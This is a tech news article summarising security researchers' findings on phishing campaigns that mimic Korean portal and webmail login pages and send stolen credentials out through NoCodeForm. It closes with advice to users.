Skip to content

Scammers use Korean portals for complex phishing campaigns

  • by
  • 3 min read

Threat actors are using a series of sophisticated phishing attacks mimicking Korean portal websites, logistics and shipping brands, and webmail login pages. These attacks have become increasingly prevalent in recent months, utilising deceptive tactics to trick users into divulging their sensitive account information.

The phishing pages closely resemble authentic websites, making them nearly indistinguishable. Threat actors who manipulate the source code of legitimate websites achieve this level of authenticity by altering the address and data transmission methods to intercept user IDs and passwords.

Researchers have discovered that the phishing email recipients’ IDs are pre-filled, potentially leading users to unwittingly disclose their passwords. This pre-filling of information also grants a sense of trust to the victims.

One notable technique employed by the threat actors is using NoCodeForm to extract account credentials. NoCodeForm facilitates the transmission of HTML-formatted results through channels like email or Slack when a user creates an account, a unique form ID is generated, allowing external parties to capture input values.

“The threat actor also used NoCodeForm to exfiltrate account credentials. NoCodeForm provides a method of transmitting the results in HTML format through the user’s email/Slack. When an account is created, a unique form ID is made. Using this form-id, one can receive the input values of an external user,” the researchers noted.

A comparison of the phishing page on the left and the authentic page on the right. | Source: ASEC

The attackers further modified the onsubmit event handler within the form tag of the genuine website’s source code, redirecting the captured account credentials to the designated NoCodeForm form ID for exfiltration. Researchers’ internal testing confirmed that user-entered account credentials could be collected either through NoCodeForm’s default form or via email/Slack channels controlled by the attackers.

Given the sophisticated nature of the attack and near-identical replication of websites, researchers have urged users to access websites only via standard, trusted methods. In the event of a suspicious login attempt, users are advised to report the matter to the concerned authorities and immediately change the login password as a precautionary measure.

Phishing attacks have increased recently. On April 19, it was reported that LastPass users were targeted via the CryptoChameleon phishing kit. On April 9, reports came out detailing how the cybercriminals were deploying VenomRAT via the ScrubCrypt phishing tool. Moreover, on April 4, researchers discovered Agent Tesla phishing campaigns targeting companies in the United States and Australia.

In the News: Tinder ‘Share My Date’ rolls out: Share date plans with contacts

Kumar Hemant

Deputy Editor at Candid.Technology. Hemant writes at the intersection of tech and culture and has a keen interest in science, social issues and international relations. You can contact him here:

Exit mobile version